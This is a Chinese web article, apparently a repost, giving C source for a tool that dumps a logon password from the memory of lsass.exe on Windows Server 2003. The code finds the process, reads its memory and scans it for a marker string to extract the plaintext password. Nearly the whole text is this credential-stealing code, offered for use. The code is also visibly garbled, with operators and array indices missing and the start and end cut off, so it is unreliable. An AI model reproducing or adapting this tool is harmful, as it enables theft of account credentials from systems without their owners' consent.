如何在Windows 2003中得到登陆密码

if (!Is2003()) // Check Out If The Box Is 2003
{
printf("The Program Can't Only Run On Windows 2003 Platform\n");
return -1;
}

PID = GetLsassPID(); // Get The Lsass.exe PID

if (PID == 0) // Fail To Get PID If Returning Zerom
{
return -1;
}

FindPassword(PID); // Find The Password From Lsass.exe Memory
return 0;
}
// End main()

//------------------------------------------------------------------------------------
// Purpose: Search The Memory & Try To Get The Password
// Return Type: int
// Parameters:
// In: char *Buffer --> The Memory Buffer To Search
// Out: const UINT nSize --> The Size Of The Memory Buffer
// Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure"，
// Since The Password Is Near The Above Location，But It's Not Always True That
// We Will Find The Magic String，Or Even We Find It，The Password May Be Located
// At Some Other Place.We Only Look For Luck
//------------------------------------------------------------------------------------
int Search(char *Buffer，const UINT nSize)
{
UINT OffSet = 0;
UINT i = 0;
UINT j = 0 ;
UINT Count = 0;
if (Buffer == NULL)
{
return -1;
}
for (i = 0 ; i < nSize ; i )
{
/* The Below Is To Find The Magic String，Why So Complicated?That Will Thank MS.The Separation From Word To Word
Is Not Separated With A Space，But With A Ending Character，So Any Search API Like strstr() Will Fail To Locate
The Magic String，We Have To Do It Manually And Slowly
*/
if (Buffer == 'L')
{
OffSet = 0;
if (strnicmp(&Buffer[i OffSet]，"LocalSystem"，strlen("LocalSystem")) == 0)
{
OffSet = strlen("LocalSystem") 1;
if (strnicmp(&Buffer[i OffSet]，"Remote"，strlen("Remote")) == 0)
{
OffSet = strlen("Remote") 1;
if (strnicmp(&Buffer[i OffSet]，"Procedure"，strlen("Procedure")) == 0)
{
OffSet = strlen("Procedure") 1;
if (strnicmp(&Buffer[i OffSet]，"Call"，strlen("Call")) == 0)
{
i = OffSet;
break;
}
}
}
}
}
}

if (i < nSize)
{
ZeroMemory(Password，sizeof(Password));
for (; i < nSize ; i )
{
if (Buffer == 0x02 && Buffer[i 1] == 0 && Buffer[i 2] == 0 && Buffer[i 3] == 0 && Buffer[i 4] == 0 && Buffer[i 5] == 0 && Buffer[i 6] == 0)
{
/* The Below Code Is To Retrieve The Password.Since The String Is In Unicode Format，So We Will Do It In
That Way
*/
j = i 7;
for (; j < nSize; j = 2)
{
if (Buffer[j] > 0)
{
Password[Count ] = Buffer[j];
}
else
{
break;
}
}
return i 7; // One Flag To Indicate We Find The Password
}
}
}
return -1; // Well，We Fail To Find The Password，And This Always Happens
}
// End Search

//------------------------------------------------------------------------------------
// Purpose: To Get The Lsass.exe PID
// Return Type: DWORD
// Parameters: None
//------------------------------------------------------------------------------------
DWORD GetLsassPID()
{
HANDLE hProcessSnap;
HANDLE hProcess = NULL;
PROCESSENTRY32 pe32;
DWORD PID = 0;

hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS， 0);
if( hProcessSnap == INVALID_HANDLE_VALUE )
{
printf("Fail To Create Snap Shot\n");
return 0;
}

pe32.dwSize = sizeof(PROCESSENTRY32);

if( !Process32First(hProcessSnap， &pe32))
{
CloseHandle(hProcessSnap); // Must clean up the snapshot object!
return 0;
}

do
{
if (strcmpi(pe32.szExeFile，"Lsass.EXE") == 0)
{
PID = pe32.th32ProcessID;
break;
}
}while(Process32Next( hProcessSnap， &pe32));

CloseHandle( hProcessSnap);
return PID;
}
// End GetLsassPID()

//------------------------------------------------------------------------------------
// Purpose: To Find The Password
// Return Type: BOOLEAN
// Parameters:
// In: DWORD PID -> The Lsass.exe's PID
//------------------------------------------------------------------------------------
BOOL FindPassword(DWORD PID)
{
HANDLE hProcess = NULL;
char Buffer[5 * 1024] = ;
DWORD ByteGet = 0;
int Found = -1;

hProcess = OpenProcess(PROCESS_VM_READ，FALSE，PID); // Open Process
if (hProcess == NULL)
{
printf("Fail To Open Process\n");
return FALSE;
}

if (!ReadProcessMemory(hProcess，(PVOID)BaseAddress，Buffer，5 * 1024，&ByteGet)) // Read The Memory From Lsass.exe
{
printf("Fail To Read Memory\n");
CloseHandle(hProcess);
return FALSE;
}

CloseHandle(hProcess);

Found = Search(Buffer，ByteGet); // Search The Password
if (Found >= 0) // We May Find The Password
{
if (strlen(Password) > 0) // Yes，We Find The Password Even We Don't Know If The Password Is Correct Or Not

文章整理：西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!